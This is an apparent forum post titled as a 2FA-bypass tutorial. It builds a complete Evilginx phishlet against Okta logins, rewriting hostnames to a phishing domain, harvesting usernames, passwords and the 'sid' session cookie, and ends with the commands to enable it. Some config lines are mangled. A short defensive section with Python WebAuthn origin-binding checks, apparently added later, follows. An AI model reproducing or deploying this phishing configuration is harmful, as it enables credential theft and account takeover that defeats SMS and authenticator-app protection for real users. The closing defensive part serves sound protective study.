Learning how to bypass two-factor authentication (Google Authenticator, SMS)
<blockquote data-quote="Ghosthunter" data-source="post: 511" data-attributes="member: 6"><p>After collecting this and a couple of other requests, we get the following settings:</p><p></p><p>Code:</p><p>sub_filters:</p><p> - {triggers_on: '<target domain>.okta.com', orig_sub: '<target domain>', domain: 'okta.com', search: 'https://{hostname}/api', replace: 'https://{hostname}/api', mimes: ['text/html', 'application/json']}</p><p> - {triggers_on: 'login.okta.com', orig_sub: 'login', domain: 'okta.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}</p><p> - {triggers_on: '<target domain>.okta.com', orig_sub: ", domain: '<target domain>.okta.com', search: 'https\x3A\x2F\x2F{hostname}', replace: 'httpsx3Ax2Fx2F{hostname}', mimes: ['text / html', 'application/json', 'application/x-javascript', 'text/javascript']}</p><p> - {triggers_on: '<target domain>.okta.com', orig_sub: ", domain: '<target domain>.okta.com', search: '\x2Fuser\x2Fnotifications', replace: 'httpsx3Ax2Fx2F < target domain>. okta.comx2Fuserx2Fnotifications', mimes: ['text / html', 'application/json', 'application/x-javascript', 'text/javascript']}</p><p></p><p>Keyword {hostname}</p><p></p><p>is used to replace the original domain with a phishing one. Read more about the syntax of this section <a href="https://github.com/kgretzky/evilginx2/wiki/Phishlet-File-Format-(2.2.0)#sub_filters" target="_blank">here</a>.</p><p></p><p>Remember, we need cookies that we will use to log in to the site. Through trial and error, we find out the cookie name: sid</p><p></p><p>, and add it to the settings:</p><p></p><p>Code:</p><p>auth_tokens:</p><p> - domain: '< target domain>.okta.com'</p><p> keys: ['sid']</p><p></p><p>We will also need the user's username and password. We have already found the request in which they are transmitted. 
As you can see in the request, the parameters we need are username</p><p></p><p>and password</p><p></p><p>passed in JSON, so we append them:</p><p></p><p>Code:</p><p>credentials:</p><p> username:</p><p> key: 'username'</p><p> search: '"username":"([^"]*)'</p><p> type: 'json'</p><p> password:</p><p> key: 'password'</p><p> search: '"password":"([^"]*)'</p><p> type: 'json'</p><p></p><p>This way, Evilginx can isolate them from requests and save them correctly.</p><p></p><p>There's not much left. Specify the URL of the login page on the target domain.</p><p></p><p>Code:</p><p>landing_path:</p><p> - '/login/login.htm'</p><p></p><p>Specify the URL that we will use to indicate that the user has successfully logged in.</p><p></p><p>Code:</p><p>auth_urls:</p><p> - 'app/UserHome'</p><p></p><p>That's all! The entire config:</p><p></p><p>Code:</p><p>name: 'okta'</p><p>author: '@*******, updated by @*******'</p><p>min_ver: '2.2.0'</p><p>proxy_hosts:</p><p> - {phish_sub:", orig_sub: '<target company name subdomain>", domain: 'okta.com', session: true, is_landing: true}</p><p>sub_filters:</p><p>sub_filters:</p><p> - {triggers_on: '<target domain>.okta.com', orig_sub: '<target domain>', domain: 'okta.com', search: 'https://{hostname}/api', replace: 'https://{hostname}/api', mimes: ['text/html', 'application/json']}</p><p> - {triggers_on: 'login.okta.com', orig_sub: 'login', domain: 'okta.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}</p><p> - {triggers_on: '<target domain>.okta.com', orig_sub: ", domain: '<target domain>.okta.com', search: 'https\x3A\x2F\x2F{hostname}', replace: 'httpsx3Ax2Fx2F{hostname}', mimes: ['text / html', 'application/json', 'application/x-javascript', 'text/javascript']}</p><p> - {triggers_on: '<target domain>.okta.com', orig_sub: ", domain: '<target domain>.okta.com', search: '\x2Fuser\x2Fnotifications', replace: 'httpsx3Ax2Fx2F < target domain>. 
okta.comx2Fuserx2Fnotifications', mimes: ['text / html', 'application/json', 'application/x-javascript', 'text/javascript']}</p><p></p><p>Save it as okta.yaml</p><p></p><p>Code:</p><p>in/usr/share/evilginx/phishlets</p><p></p><h4>Step four: enable our new phishing feature</h4><p>Run evilginx and write the command</p><p></p><p>Code:</p><p>phishlets hostname okta okta.<our phishing domain>. com</p><p></p><p>Enabling phishlet.</p><p></p><p>Code:</p><p>phishlets enable okta</p><p></p><p>A certificate from LetsEncrypt is automatically created for it.</p></blockquote><p></p>
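The setup quoted above depends on the login page being served under a different hostname while passwords, one-time codes and the `sid` session cookie pass through unchanged. Origin-bound authenticators (WebAuthn/FIDO2) close that gap because the browser records the hostname it actually loaded inside the signed response. The following is an added example, not part of the quoted post, of the binding checks a relying party performs; the origin, RP ID and sample data are constructed placeholders.

```python
import base64
import hashlib
import hmac
import json

# Assumption: placeholder values for the relying party's real origin and RP ID.
EXPECTED_ORIGIN = "https://tenant.example.com"
EXPECTED_RP_ID = "example.com"


def b64url_decode(data: str) -> bytes:
    return base64.urlsafe_b64decode(data + "=" * (-len(data) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def check_assertion_binding(client_data_json: bytes, authenticator_data: bytes,
                            expected_challenge: bytes) -> tuple[bool, str]:
    """Binding checks made before signature verification.

    The signature covers authenticatorData || SHA-256(clientDataJSON), so a
    proxy in the middle cannot rewrite these fields without invalidating it.
    """
    client_data = json.loads(client_data_json)
    if client_data.get("type") != "webauthn.get":
        return False, "wrong ceremony type"
    challenge = b64url_decode(client_data.get("challenge", ""))
    if not hmac.compare_digest(challenge, expected_challenge):
        return False, "challenge mismatch"
    # The browser, not the page, writes the origin it actually loaded.
    if client_data.get("origin") != EXPECTED_ORIGIN:
        return False, f"origin mismatch: {client_data.get('origin')}"
    # The first 32 bytes of authenticatorData are SHA-256 of the RP ID used.
    if authenticator_data[:32] != hashlib.sha256(EXPECTED_RP_ID.encode()).digest():
        return False, "rpIdHash mismatch"
    return True, "binding ok, verify signature next"


def make_sample(origin: str, rp_id: str, challenge: bytes) -> tuple[bytes, bytes]:
    """Constructed sample of what a browser returns for a page at `origin`."""
    client_data_json = json.dumps({"type": "webauthn.get",
                                   "challenge": b64url_encode(challenge),
                                   "origin": origin}).encode()
    # rpIdHash + flags (user present) + signature counter
    auth_data = hashlib.sha256(rp_id.encode()).digest() + b"\x01" + (1).to_bytes(4, "big")
    return client_data_json, auth_data
```

A response produced on any hostname other than the expected origin fails the third check, which is why moving users from SMS or TOTP codes to origin-bound credentials is the standard mitigation for this class of proxy.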